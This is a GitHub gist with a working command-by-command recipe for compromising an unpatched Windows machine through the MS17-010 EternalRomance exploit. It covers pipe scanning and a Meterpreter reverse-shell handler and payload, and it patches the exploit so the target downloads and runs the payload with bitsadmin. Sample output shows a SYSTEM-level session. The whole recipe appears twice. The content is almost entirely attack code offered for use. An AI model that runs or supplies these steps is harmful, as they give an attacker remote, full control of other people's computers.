xillwillx/gist:6db5cd392acafc1ac486f9852f698be6

## gistfile1.txt
# Test victim IP first to see if exploitable
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS 192.168.128.19
exploit

#*choose pipe name 'netlogon'

######Exploiting the Victim##########
# Setup Meterpreter Handler
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST $IP >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc
cat meterpreter.rc
msfconsole -r meterpreter.rc


# in a new tab Create Meterpreter payload in www dir
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -f exe-service > /var/www/html/1.exe

# Start Webserver
service apache2 start

# Grab Exploit Scripts and SED the script to add out meterpreter payload instead
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
wget https://www.exploit-db.com/download/42315 -O EternalRomance.py
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" EternalRomance.py
sed -i -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c bitsadmin \/transfer wcb \/priority high http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

##################################
# Exploit that motherfucker (change the ip obviously)
python EternalRomance.py 192.168.128.19 netlogon


Result should give you a meterpreter shell
[*] Sending stage (957487 bytes) to 192.168.128.19
[*] Meterpreter session 1 opened (192.168.128.17:4444 -> 192.168.128.19:49176) at 2017-09-30 05:08:42 -0400
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
	# Test victim IP first to see if exploitable
	msfconsole
	use auxiliary/scanner/smb/pipe_auditor
	set RHOSTS 192.168.128.19
	exploit

	#*choose pipe name 'netlogon'

	######Exploiting the Victim##########
	# Setup Meterpreter Handler
	IP=`ip -4 addr show eth0 \| grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
	touch meterpreter.rc
	echo use exploit/multi/handler >> meterpreter.rc
	echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
	echo set LHOST $IP >> meterpreter.rc
	echo set ExitOnSession false >> meterpreter.rc
	echo exploit -j -z >> meterpreter.rc
	cat meterpreter.rc
	msfconsole -r meterpreter.rc


	# in a new tab Create Meterpreter payload in www dir
	msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -f exe-service > /var/www/html/1.exe

	# Start Webserver
	service apache2 start

	# Grab Exploit Scripts and SED the script to add out meterpreter payload instead
	IP=`ip -4 addr show eth0 \| grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
	wget https://www.exploit-db.com/download/42315 -O EternalRomance.py
	wget https://github.com/worawit/MS17-010/raw/master/mysmb.py
	sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" EternalRomance.py
	sed -i -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c bitsadmin \/transfer wcb \/priority high http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

	##################################
	# Exploit that motherfucker (change the ip obviously)
	python EternalRomance.py 192.168.128.19 netlogon



	Result should give you a meterpreter shell
	[*] Sending stage (957487 bytes) to 192.168.128.19
	[*] Meterpreter session 1 opened (192.168.128.17:4444 -> 192.168.128.19:49176) at 2017-09-30 05:08:42 -0400
	msf exploit(handler) > sessions -i 1
	[*] Starting interaction with 1...
	meterpreter > getuid
	Server username: NT AUTHORITY\SYSTEM